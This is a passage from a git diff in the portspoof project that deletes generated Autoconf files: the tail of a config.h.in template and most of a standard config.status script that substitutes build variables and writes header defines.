HAVE_STDLIB_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_STRINGS_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_STRING_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_SYSLOG_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_SYS_IOCTL_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_SYS_SOCKET_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_SYS_STAT_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_SYS_TIMEB_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_SYS_TYPES_H - -/* Define to 1 if you have that is POSIX.1 compatible. */ -#undef HAVE_SYS_WAIT_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_UNISTD_H - -/* Name of package */ -#undef PACKAGE - -/* Define to the address where bug reports for this package should be sent. */ -#undef PACKAGE_BUGREPORT - -/* Define to the full name of this package. */ -#undef PACKAGE_NAME - -/* Define to the full name and version of this package. */ -#undef PACKAGE_STRING - -/* Define to the one symbol short name of this package. */ -#undef PACKAGE_TARNAME - -/* Define to the version of this package. */ -#undef PACKAGE_VERSION - -/* Define to 1 if you have the ANSI C header files. */ -#undef STDC_HEADERS - -/* Version number of package */ -#undef VERSION - -/* Define to empty if `const' does not conform to ANSI C. */ -#undef const - -/* Define to rpl_malloc if the replacement function should be used. */ -#undef malloc - -/* Define to `unsigned int' if does not define. */ -#undef size_t diff --git a/config.status b/config.status deleted file mode 100755 index 4c9a4d8..0000000 --- a/config.status +++ /dev/null @@ -1,1071 +0,0 @@ -#! /bin/sh -# Generated by configure. -# Run this file to recreate the current configuration. -# Compiler output produced by configure, useful for debugging -# configure, is in config.log if it exists. - -debug=false -ac_cs_recheck=false -ac_cs_silent=false -SHELL=${CONFIG_SHELL-/bin/sh} -## --------------------- ## -## M4sh Initialization. ## -## --------------------- ## - -# Be more Bourne compatible -DUALCASE=1; export DUALCASE # for MKS sh -if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then - emulate sh - NULLCMD=: - # Zsh 3.x and 4.x performs word splitting on ${1+"$@"}, which - # is contrary to our usage. Disable this feature. - alias -g '${1+"$@"}'='"$@"' - setopt NO_GLOB_SUBST -else - case `(set -o) 2>/dev/null` in - *posix*) set -o posix ;; -esac - -fi - - - - -# PATH needs CR -# Avoid depending upon Character Ranges. -as_cr_letters='abcdefghijklmnopqrstuvwxyz' -as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' -as_cr_Letters=$as_cr_letters$as_cr_LETTERS -as_cr_digits='0123456789' -as_cr_alnum=$as_cr_Letters$as_cr_digits - -# The user is always right. -if test "${PATH_SEPARATOR+set}" != set; then - echo "#! /bin/sh" >conf$$.sh - echo "exit 0" >>conf$$.sh - chmod +x conf$$.sh - if (PATH="/nonexistent;."; conf$$.sh) >/dev/null 2>&1; then - PATH_SEPARATOR=';' - else - PATH_SEPARATOR=: - fi - rm -f conf$$.sh -fi - -# Support unset when possible. -if ( (MAIL=60; unset MAIL) || exit) >/dev/null 2>&1; then - as_unset=unset -else - as_unset=false -fi - - -# IFS -# We need space, tab and new line, in precisely that order. Quoting is -# there to prevent editors from complaining about space-tab. -# (If _AS_PATH_WALK were called with IFS unset, it would disable word -# splitting by setting IFS to empty value.) -as_nl=' -' -IFS=" "" $as_nl" - -# Find who we are. Look in the path if we contain no directory separator. -case $0 in - *[\\/]* ) as_myself=$0 ;; - *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break -done -IFS=$as_save_IFS - - ;; -esac -# We did not find ourselves, most probably we were run as `sh COMMAND' -# in which case we are not to be found in the path. -if test "x$as_myself" = x; then - as_myself=$0 -fi -if test ! -f "$as_myself"; then - echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 - { (exit 1); exit 1; } -fi - -# Work around bugs in pre-3.0 UWIN ksh. -for as_var in ENV MAIL MAILPATH -do ($as_unset $as_var) >/dev/null 2>&1 && $as_unset $as_var -done -PS1='$ ' -PS2='> ' -PS4='+ ' - -# NLS nuisances. -for as_var in \ - LANG LANGUAGE LC_ADDRESS LC_ALL LC_COLLATE LC_CTYPE LC_IDENTIFICATION \ - LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER \ - LC_TELEPHONE LC_TIME -do - if (set +x; test -z "`(eval $as_var=C; export $as_var) 2>&1`"); then - eval $as_var=C; export $as_var - else - ($as_unset $as_var) >/dev/null 2>&1 && $as_unset $as_var - fi -done - -# Required to use basename. -if expr a : '\(a\)' >/dev/null 2>&1 && - test "X`expr 00001 : '.*\(...\)'`" = X001; then - as_expr=expr -else - as_expr=false -fi - -if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then - as_basename=basename -else - as_basename=false -fi - - -# Name of the executable. -as_me=`$as_basename -- "$0" || -$as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ - X"$0" : 'X\(//\)$' \| \ - X"$0" : 'X\(/\)' \| . 2>/dev/null || -echo X/"$0" | - sed '/^.*\/\([^/][^/]*\)\/*$/{ - s//\1/ - q - } - /^X\/\(\/\/\)$/{ - s//\1/ - q - } - /^X\/\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - -# CDPATH. -$as_unset CDPATH - - - - as_lineno_1=$LINENO - as_lineno_2=$LINENO - test "x$as_lineno_1" != "x$as_lineno_2" && - test "x`expr $as_lineno_1 + 1`" = "x$as_lineno_2" || { - - # Create $as_me.lineno as a copy of $as_myself, but with $LINENO - # uniformly replaced by the line number. The first 'sed' inserts a - # line-number line after each line using $LINENO; the second 'sed' - # does the real work. The second script uses 'N' to pair each - # line-number line with the line containing $LINENO, and appends - # trailing '-' during substitution so that $LINENO is not a special - # case at line end. - # (Raja R Harinath suggested sed '=', and Paul Eggert wrote the - # scripts with optimization help from Paolo Bonzini. Blame Lee - # E. McMahon (1931-1989) for sed's syntax. :-) - sed -n ' - p - /[$]LINENO/= - ' <$as_myself | - sed ' - s/[$]LINENO.*/&-/ - t lineno - b - :lineno - N - :loop - s/[$]LINENO\([^'$as_cr_alnum'_].*\n\)\(.*\)/\2\1\2/ - t loop - s/-\n.*// - ' >$as_me.lineno && - chmod +x "$as_me.lineno" || - { echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2 - { (exit 1); exit 1; }; } - - # Don't try to exec as it changes $[0], causing all sort of problems - # (the dirname of $[0] is not the place where we might find the - # original and so on. Autoconf is especially sensitive to this). - . "./$as_me.lineno" - # Exit status is that of the last command. - exit -} - - -if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then - as_dirname=dirname -else - as_dirname=false -fi - -ECHO_C= ECHO_N= ECHO_T= -case `echo -n x` in --n*) - case `echo 'x\c'` in - *c*) ECHO_T=' ';; # ECHO_T is single tab character. - *) ECHO_C='\c';; - esac;; -*) - ECHO_N='-n';; -esac - -if expr a : '\(a\)' >/dev/null 2>&1 && - test "X`expr 00001 : '.*\(...\)'`" = X001; then - as_expr=expr -else - as_expr=false -fi - -rm -f conf$$ conf$$.exe conf$$.file -if test -d conf$$.dir; then - rm -f conf$$.dir/conf$$.file -else - rm -f conf$$.dir - mkdir conf$$.dir -fi -echo >conf$$.file -if ln -s conf$$.file conf$$ 2>/dev/null; then - as_ln_s='ln -s' - # ... but there are two gotchas: - # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. - # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. - # In both cases, we have to default to `cp -p'. - ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || - as_ln_s='cp -p' -elif ln conf$$.file conf$$ 2>/dev/null; then - as_ln_s=ln -else - as_ln_s='cp -p' -fi -rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file -rmdir conf$$.dir 2>/dev/null - -if mkdir -p . 2>/dev/null; then - as_mkdir_p=: -else - test -d ./-p && rmdir ./-p - as_mkdir_p=false -fi - -if test -x / >/dev/null 2>&1; then - as_test_x='test -x' -else - if ls -dL / >/dev/null 2>&1; then - as_ls_L_option=L - else - as_ls_L_option= - fi - as_test_x=' - eval sh -c '\'' - if test -d "$1"; then - test -d "$1/."; - else - case $1 in - -*)set "./$1";; - esac; - case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in - ???[sx]*):;;*)false;;esac;fi - '\'' sh - ' -fi -as_executable_p=$as_test_x - -# Sed expression to map a string onto a valid CPP name. -as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" - -# Sed expression to map a string onto a valid variable name. -as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" - - -exec 6>&1 - -# Save the log message, to keep $[0] and so on meaningful, and to -# report actual input values of CONFIG_FILES etc. instead of their -# values after options handling. -ac_log=" -This file was extended by portspoof $as_me 0.1, which was -generated by GNU Autoconf 2.61. Invocation command line was - - CONFIG_FILES = $CONFIG_FILES - CONFIG_HEADERS = $CONFIG_HEADERS - CONFIG_LINKS = $CONFIG_LINKS - CONFIG_COMMANDS = $CONFIG_COMMANDS - $ $0 $@ - -on `(hostname || uname -n) 2>/dev/null | sed 1q` -" - -# Files that config.status was made for. -config_files=" Makefile src/Makefile tools/Makefile" -config_headers=" src/config.h" -config_commands=" depfiles" - -ac_cs_usage="\ -\`$as_me' instantiates files from templates according to the -current configuration. - -Usage: $0 [OPTIONS] [FILE]... - - -h, --help print this help, then exit - -V, --version print version number and configuration settings, then exit - -q, --quiet do not print progress messages - -d, --debug don't remove temporary files - --recheck update $as_me by reconfiguring in the same conditions - --file=FILE[:TEMPLATE] - instantiate the configuration file FILE - --header=FILE[:TEMPLATE] - instantiate the configuration header FILE - -Configuration files: -$config_files - -Configuration headers: -$config_headers - -Configuration commands: -$config_commands - -Report bugs to ." - -ac_cs_version="\ -portspoof config.status 0.1 -configured by ./configure, generated by GNU Autoconf 2.61, - with options \"\" - -Copyright (C) 2006 Free Software Foundation, Inc. -This config.status script is free software; the Free Software Foundation -gives unlimited permission to copy, distribute and modify it." - -ac_pwd='/Users/k1wi/Desktop/portspoof' -srcdir='.' -INSTALL='/usr/bin/install -c' -MKDIR_P='auto/install-sh -c -d' -# If no file are specified by the user, then we need to provide default -# value. By we need to know if files were specified by the user. -ac_need_defaults=: -while test $# != 0 -do - case $1 in - --*=*) - ac_option=`expr "X$1" : 'X\([^=]*\)='` - ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'` - ac_shift=: - ;; - *) - ac_option=$1 - ac_optarg=$2 - ac_shift=shift - ;; - esac - - case $ac_option in - # Handling of the options. - -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) - ac_cs_recheck=: ;; - --version | --versio | --versi | --vers | --ver | --ve | --v | -V ) - echo "$ac_cs_version"; exit ;; - --debug | --debu | --deb | --de | --d | -d ) - debug=: ;; - --file | --fil | --fi | --f ) - $ac_shift - CONFIG_FILES="$CONFIG_FILES $ac_optarg" - ac_need_defaults=false;; - --header | --heade | --head | --hea ) - $ac_shift - CONFIG_HEADERS="$CONFIG_HEADERS $ac_optarg" - ac_need_defaults=false;; - --he | --h) - # Conflict between --help and --header - { echo "$as_me: error: ambiguous option: $1 -Try \`$0 --help' for more information." >&2 - { (exit 1); exit 1; }; };; - --help | --hel | -h ) - echo "$ac_cs_usage"; exit ;; - -q | -quiet | --quiet | --quie | --qui | --qu | --q \ - | -silent | --silent | --silen | --sile | --sil | --si | --s) - ac_cs_silent=: ;; - - # This is an error. - -*) { echo "$as_me: error: unrecognized option: $1 -Try \`$0 --help' for more information." >&2 - { (exit 1); exit 1; }; } ;; - - *) ac_config_targets="$ac_config_targets $1" - ac_need_defaults=false ;; - - esac - shift -done - -ac_configure_extra_args= - -if $ac_cs_silent; then - exec 6>/dev/null - ac_configure_extra_args="$ac_configure_extra_args --silent" -fi - -if $ac_cs_recheck; then - echo "running CONFIG_SHELL=/bin/sh /bin/sh ./configure " $ac_configure_extra_args " --no-create --no-recursion" >&6 - CONFIG_SHELL=/bin/sh - export CONFIG_SHELL - exec /bin/sh "./configure" $ac_configure_extra_args --no-create --no-recursion -fi - -exec 5>>config.log -{ - echo - sed 'h;s/./-/g;s/^.../## /;s/...$/ ##/;p;x;p;x' <<_ASBOX -## Running $as_me. ## -_ASBOX - echo "$ac_log" -} >&5 - -# -# INIT-COMMANDS -# -AMDEP_TRUE="" ac_aux_dir="auto" - - -# Handling of arguments. -for ac_config_target in $ac_config_targets -do - case $ac_config_target in - "src/config.h") CONFIG_HEADERS="$CONFIG_HEADERS src/config.h" ;; - "depfiles") CONFIG_COMMANDS="$CONFIG_COMMANDS depfiles" ;; - "Makefile") CONFIG_FILES="$CONFIG_FILES Makefile" ;; - "src/Makefile") CONFIG_FILES="$CONFIG_FILES src/Makefile" ;; - "tools/Makefile") CONFIG_FILES="$CONFIG_FILES tools/Makefile" ;; - - *) { { echo "$as_me:$LINENO: error: invalid argument: $ac_config_target" >&5 -echo "$as_me: error: invalid argument: $ac_config_target" >&2;} - { (exit 1); exit 1; }; };; - esac -done - - -# If the user did not use the arguments to specify the items to instantiate, -# then the envvar interface is used. Set only those that are not. -# We use the long form for the default assignment because of an extremely -# bizarre bug on SunOS 4.1.3. -if $ac_need_defaults; then - test "${CONFIG_FILES+set}" = set || CONFIG_FILES=$config_files - test "${CONFIG_HEADERS+set}" = set || CONFIG_HEADERS=$config_headers - test "${CONFIG_COMMANDS+set}" = set || CONFIG_COMMANDS=$config_commands -fi - -# Have a temporary directory for convenience. Make it in the build tree -# simply because there is no reason against having it here, and in addition, -# creating and moving files from /tmp can sometimes cause problems. -# Hook for its removal unless debugging. -# Note that there is a small window in which the directory will not be cleaned: -# after its creation but before its name has been assigned to `$tmp'. -$debug || -{ - tmp= - trap 'exit_status=$? - { test -z "$tmp" || test ! -d "$tmp" || rm -fr "$tmp"; } && exit $exit_status -' 0 - trap '{ (exit 1); exit 1; }' 1 2 13 15 -} -# Create a (secure) tmp directory for tmp files. - -{ - tmp=`(umask 077 && mktemp -d "./confXXXXXX") 2>/dev/null` && - test -n "$tmp" && test -d "$tmp" -} || -{ - tmp=./conf$$-$RANDOM - (umask 077 && mkdir "$tmp") -} || -{ - echo "$me: cannot create a temporary directory in ." >&2 - { (exit 1); exit 1; } -} - -# -# Set up the sed scripts for CONFIG_FILES section. -# - -# No need to generate the scripts if there are no CONFIG_FILES. -# This happens for instance when ./config.status config.h -if test -n "$CONFIG_FILES"; then - -cat >"$tmp/subs-1.sed" <<\CEOF -/@[a-zA-Z_][a-zA-Z_0-9]*@/!b end -s,@SHELL@,|#_!!_#|/bin/sh,g -s,@PATH_SEPARATOR@,|#_!!_#|:,g -s,@PACKAGE_NAME@,|#_!!_#|portspoof,g -s,@PACKAGE_TARNAME@,|#_!!_#|portspoof,g -s,@PACKAGE_VERSION@,|#_!!_#|0.1,g -s,@PACKAGE_STRING@,|#_!!_#|portspoof 0.1,g -s,@PACKAGE_BUGREPORT@,|#_!!_#|piotr at duszynski.eu,g -s,@exec_prefix@,|#_!!_#|${prefix},g -s,@prefix@,|#_!!_#|/usr/local,g -s,@program_transform_name@,|#_!!_#|s\,x\,x\,,g -s,@bindir@,|#_!!_#|${exec_prefix}/bin,g -s,@sbindir@,|#_!!_#|${exec_prefix}/sbin,g -s,@libexecdir@,|#_!!_#|${exec_prefix}/libexec,g -s,@datarootdir@,|#_!!_#|${prefix}/share,g -s,@datadir@,|#_!!_#|${datarootdir},g -s,@sysconfdir@,|#_!!_#|${prefix}/etc,g -s,@sharedstatedir@,|#_!!_#|${prefix}/com,g -s,@localstatedir@,|#_!!_#|${prefix}/var,g -s,@includedir@,|#_!!_#|${prefix}/include,g -s,@oldincludedir@,|#_!!_#|/usr/include,g -s,@docdir@,|#_!!_#|${datarootdir}/doc/${PACKAGE_TARNAME},g -s,@infodir@,|#_!!_#|${datarootdir}/info,g -s,@htmldir@,|#_!!_#|${docdir},g -s,@dvidir@,|#_!!_#|${docdir},g -s,@pdfdir@,|#_!!_#|${docdir},g -s,@psdir@,|#_!!_#|${docdir},g -s,@libdir@,|#_!!_#|${exec_prefix}/lib,g -s,@localedir@,|#_!!_#|${datarootdir}/locale,g -s,@mandir@,|#_!!_#|${datarootdir}/man,g -s,@DEFS@,|#_!!_#|-DHAVE_CONFIG_H,g -s,@ECHO_C@,|#_!!_#|\\c,g -s,@ECHO_N@,|#_!!_#|,g -s,@ECHO_T@,|#_!!_#|,g -s,@LIBS@,|#_!!_#|,g -s,@build_alias@,|#_!!_#|,g -s,@host_alias@,|#_!!_#|,g -s,@target_alias@,|#_!!_#|,g -s,@INSTALL_PROGRAM@,|#_!!_#|${INSTALL},g -s,@INSTALL_SCRIPT@,|#_!!_#|${INSTALL},g -s,@INSTALL_DATA@,|#_!!_#|${INSTALL} -m 644,g -s,@am__isrc@,|#_!!_#|,g -s,@CYGPATH_W@,|#_!!_#|echo,g -s,@PACKAGE@,|#_!!_#|portspoof,g -s,@VERSION@,|#_!!_#|0.1,g -s,@ACLOCAL@,|#_!!_#|${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run aclocal-1.10,g -s,@AUTOCONF@,|#_!!_#|${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run autoconf,g -s,@AUTOMAKE@,|#_!!_#|${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run automake-1.10,g -s,@AUTOHEADER@,|#_!!_#|${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run autoheader,g -s,@MAKEINFO@,|#_!!_#|${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run makeinfo,g -s,@install_sh@,|#_!!_#|$(SHELL) /Users/k1wi/Desktop/portspoof/auto/install-sh,g -s,@STRIP@,|#_!!_#|,g -s,@INSTALL_STRIP_PROGRAM@,|#_!!_#|$(install_sh) -c -s,g -s,@mkdir_p@,|#_!!_#|$(top_builddir)/auto/install-sh -c -d,g -s,@AWK@,|#_!!_#|awk,g -s,@SET_MAKE@,|#_!!_#|,g -s,@am__leading_dot@,|#_!!_#|.,g -s,@AMTAR@,|#_!!_#|${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run tar,g -s,@am__tar@,|#_!!_#|${AMTAR} chof - "$$tardir",g -s,@am__untar@,|#_!!_#|${AMTAR} xf -,g -s,@build@,|#_!!_#|i386-apple-darwin11.4.0,g -s,@build_cpu@,|#_!!_#|i386,g -s,@build_vendor@,|#_!!_#|apple,g -s,@build_os@,|#_!!_#|darwin11.4.0,g -s,@host@,|#_!!_#|i386-apple-darwin11.4.0,g -s,@host_cpu@,|#_!!_#|i386,g -s,@host_vendor@,|#_!!_#|apple,g -s,@host_os@,|#_!!_#|darwin11.4.0,g -s,@CC@,|#_!!_#|gcc,g -s,@CFLAGS@,|#_!!_#|-g -O2,g -s,@LDFLAGS@,|#_!!_#|,g -s,@CPPFLAGS@,|#_!!_#|,g -s,@ac_ct_CC@,|#_!!_#|gcc,g -s,@EXEEXT@,|#_!!_#|,g -s,@OBJEXT@,|#_!!_#|o,g -s,@DEPDIR@,|#_!!_#|.deps,g -s,@am__include@,|#_!!_#|include,g -s,@am__quote@,|#_!!_#|,g -s,@AMDEP_TRUE@,|#_!!_#|,g -s,@AMDEP_FALSE@,|#_!!_#|#,g -s,@AMDEPBACKSLASH@,|#_!!_#|\\,g -s,@CCDEPMODE@,|#_!!_#|depmode=gcc3,g -s,@am__fastdepCC_TRUE@,|#_!!_#|,g -s,@am__fastdepCC_FALSE@,|#_!!_#|#,g -s,@CPP@,|#_!!_#|gcc -E,g -s,@GREP@,|#_!!_#|/usr/bin/grep,g -s,@EGREP@,|#_!!_#|/usr/bin/grep -E,g -s,@LIBOBJS@,|#_!!_#|,g -s,@LTLIBOBJS@,|#_!!_#|,g -:end -s/|#_!!_#|//g -CEOF -fi # test -n "$CONFIG_FILES" - - -for ac_tag in :F $CONFIG_FILES :H $CONFIG_HEADERS :C $CONFIG_COMMANDS -do - case $ac_tag in - :[FHLC]) ac_mode=$ac_tag; continue;; - esac - case $ac_mode$ac_tag in - :[FHL]*:*);; - :L* | :C*:*) { { echo "$as_me:$LINENO: error: Invalid tag $ac_tag." >&5 -echo "$as_me: error: Invalid tag $ac_tag." >&2;} - { (exit 1); exit 1; }; };; - :[FH]-) ac_tag=-:-;; - :[FH]*) ac_tag=$ac_tag:$ac_tag.in;; - esac - ac_save_IFS=$IFS - IFS=: - set x $ac_tag - IFS=$ac_save_IFS - shift - ac_file=$1 - shift - - case $ac_mode in - :L) ac_source=$1;; - :[FH]) - ac_file_inputs= - for ac_f - do - case $ac_f in - -) ac_f="$tmp/stdin";; - *) # Look for the file first in the build tree, then in the source tree - # (if the path is not absolute). The absolute path cannot be DOS-style, - # because $ac_f cannot contain `:'. - test -f "$ac_f" || - case $ac_f in - [\\/$]*) false;; - *) test -f "$srcdir/$ac_f" && ac_f="$srcdir/$ac_f";; - esac || - { { echo "$as_me:$LINENO: error: cannot find input file: $ac_f" >&5 -echo "$as_me: error: cannot find input file: $ac_f" >&2;} - { (exit 1); exit 1; }; };; - esac - ac_file_inputs="$ac_file_inputs $ac_f" - done - - # Let's still pretend it is `configure' which instantiates (i.e., don't - # use $as_me), people would be surprised to read: - # /* config.h. Generated by config.status. */ - configure_input="Generated from "`IFS=: - echo $* | sed 's|^[^:]*/||;s|:[^:]*/|, |g'`" by configure." - if test x"$ac_file" != x-; then - configure_input="$ac_file. $configure_input" - { echo "$as_me:$LINENO: creating $ac_file" >&5 -echo "$as_me: creating $ac_file" >&6;} - fi - - case $ac_tag in - *:-:* | *:-) cat >"$tmp/stdin";; - esac - ;; - esac - - ac_dir=`$as_dirname -- "$ac_file" || -$as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$ac_file" : 'X\(//\)[^/]' \| \ - X"$ac_file" : 'X\(//\)$' \| \ - X"$ac_file" : 'X\(/\)' \| . 2>/dev/null || -echo X"$ac_file" | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - { as_dir="$ac_dir" - case $as_dir in #( - -*) as_dir=./$as_dir;; - esac - test -d "$as_dir" || { $as_mkdir_p && mkdir -p "$as_dir"; } || { - as_dirs= - while :; do - case $as_dir in #( - *\'*) as_qdir=`echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #( - *) as_qdir=$as_dir;; - esac - as_dirs="'$as_qdir' $as_dirs" - as_dir=`$as_dirname -- "$as_dir" || -$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$as_dir" : 'X\(//\)[^/]' \| \ - X"$as_dir" : 'X\(//\)$' \| \ - X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || -echo X"$as_dir" | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - test -d "$as_dir" && break - done - test -z "$as_dirs" || eval "mkdir $as_dirs" - } || test -d "$as_dir" || { { echo "$as_me:$LINENO: error: cannot create directory $as_dir" >&5 -echo "$as_me: error: cannot create directory $as_dir" >&2;} - { (exit 1); exit 1; }; }; } - ac_builddir=. - -case "$ac_dir" in -.) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; -*) - ac_dir_suffix=/`echo "$ac_dir" | sed 's,^\.[\\/],,'` - # A ".." for each directory in $ac_dir_suffix. - ac_top_builddir_sub=`echo "$ac_dir_suffix" | sed 's,/[^\\/]*,/..,g;s,/,,'` - case $ac_top_builddir_sub in - "") ac_top_builddir_sub=. ac_top_build_prefix= ;; - *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; - esac ;; -esac -ac_abs_top_builddir=$ac_pwd -ac_abs_builddir=$ac_pwd$ac_dir_suffix -# for backward compatibility: -ac_top_builddir=$ac_top_build_prefix - -case $srcdir in - .) # We are building in place. - ac_srcdir=. - ac_top_srcdir=$ac_top_builddir_sub - ac_abs_top_srcdir=$ac_pwd ;; - [\\/]* | ?:[\\/]* ) # Absolute name. - ac_srcdir=$srcdir$ac_dir_suffix; - ac_top_srcdir=$srcdir - ac_abs_top_srcdir=$srcdir ;; - *) # Relative name. - ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix - ac_top_srcdir=$ac_top_build_prefix$srcdir - ac_abs_top_srcdir=$ac_pwd/$srcdir ;; -esac -ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix - - - case $ac_mode in - :F) - # - # CONFIG_FILE - # - - case $INSTALL in - [\\/$]* | ?:[\\/]* ) ac_INSTALL=$INSTALL ;; - *) ac_INSTALL=$ac_top_build_prefix$INSTALL ;; - esac - ac_MKDIR_P=$MKDIR_P - case $MKDIR_P in - [\\/$]* | ?:[\\/]* ) ;; - */*) ac_MKDIR_P=$ac_top_build_prefix$MKDIR_P ;; - esac -# If the template does not know about datarootdir, expand it. -# FIXME: This hack should be removed a few years after 2.60. -ac_datarootdir_hack=; ac_datarootdir_seen= - -case `sed -n '/datarootdir/ { - p - q -} -/@datadir@/p -/@docdir@/p -/@infodir@/p -/@localedir@/p -/@mandir@/p -' $ac_file_inputs` in -*datarootdir*) ac_datarootdir_seen=yes;; -*@datadir@*|*@docdir@*|*@infodir@*|*@localedir@*|*@mandir@*) - { echo "$as_me:$LINENO: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&5 -echo "$as_me: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&2;} - ac_datarootdir_hack=' - s&@datadir@&${datarootdir}&g - s&@docdir@&${datarootdir}/doc/${PACKAGE_TARNAME}&g - s&@infodir@&${datarootdir}/info&g - s&@localedir@&${datarootdir}/locale&g - s&@mandir@&${datarootdir}/man&g - s&\${datarootdir}&${prefix}/share&g' ;; -esac - sed "/^[ ]*VPATH[ ]*=/{ -s/:*\$(srcdir):*/:/ -s/:*\${srcdir}:*/:/ -s/:*@srcdir@:*/:/ -s/^\([^=]*=[ ]*\):*/\1/ -s/:*$// -s/^[^=]*=[ ]*$// -} - -:t -/@[a-zA-Z_][a-zA-Z_0-9]*@/!b -s&@configure_input@&$configure_input&;t t -s&@top_builddir@&$ac_top_builddir_sub&;t t -s&@srcdir@&$ac_srcdir&;t t -s&@abs_srcdir@&$ac_abs_srcdir&;t t -s&@top_srcdir@&$ac_top_srcdir&;t t -s&@abs_top_srcdir@&$ac_abs_top_srcdir&;t t -s&@builddir@&$ac_builddir&;t t -s&@abs_builddir@&$ac_abs_builddir&;t t -s&@abs_top_builddir@&$ac_abs_top_builddir&;t t -s&@INSTALL@&$ac_INSTALL&;t t -s&@MKDIR_P@&$ac_MKDIR_P&;t t -$ac_datarootdir_hack -" $ac_file_inputs | sed -f "$tmp/subs-1.sed" >$tmp/out - -test -z "$ac_datarootdir_hack$ac_datarootdir_seen" && - { ac_out=`sed -n '/\${datarootdir}/p' "$tmp/out"`; test -n "$ac_out"; } && - { ac_out=`sed -n '/^[ ]*datarootdir[ ]*:*=/p' "$tmp/out"`; test -z "$ac_out"; } && - { echo "$as_me:$LINENO: WARNING: $ac_file contains a reference to the variable \`datarootdir' -which seems to be undefined. Please make sure it is defined." >&5 -echo "$as_me: WARNING: $ac_file contains a reference to the variable \`datarootdir' -which seems to be undefined. Please make sure it is defined." >&2;} - - rm -f "$tmp/stdin" - case $ac_file in - -) cat "$tmp/out"; rm -f "$tmp/out";; - *) rm -f "$ac_file"; mv "$tmp/out" $ac_file;; - esac - ;; - :H) - # - # CONFIG_HEADER - # - # First, check the format of the line: - cat >"$tmp/defines.sed" <<\CEOF -/^[ ]*#[ ]*undef[ ][ ]*[_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ][_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]*[ ]*/b def -/^[ ]*#[ ]*define[ ][ ]*[_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ][_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]*[( ]/b def -b -:def -s/$/ / -s,^\([ #]*\)[^ ]*\([ ]*PACKAGE_NAME\)[ (].*,\1define\2 "portspoof" , -s,^\([ #]*\)[^ ]*\([ ]*PACKAGE_TARNAME\)[ (].*,\1define\2 "portspoof" , -s,^\([ #]*\)[^ ]*\([ ]*PACKAGE_VERSION\)[ (].*,\1define\2 "0.1" , -s,^\([ #]*\)[^ ]*\([ ]*PACKAGE_STRING\)[ (].*,\1define\2 "portspoof 0.1" , -s,^\([ #]*\)[^ ]*\([ ]*PACKAGE_BUGREPORT\)[ (].*,\1define\2 "piotr at duszynski.eu" , -s,^\([ #]*\)[^ ]*\([ ]*PACKAGE\)[ (].*,\1define\2 "portspoof" , -s,^\([ #]*\)[^ ]*\([ ]*VERSION\)[ (].*,\1define\2 "0.1" , -s,^\([ #]*\)[^ ]*\([ ]*_GNU_SOURCE\)[ (].*,\1define\2 1 , -s,^\([ #]*\)[^ ]*\([ ]*STDC_HEADERS\)[ (].*,\1define\2 1 , 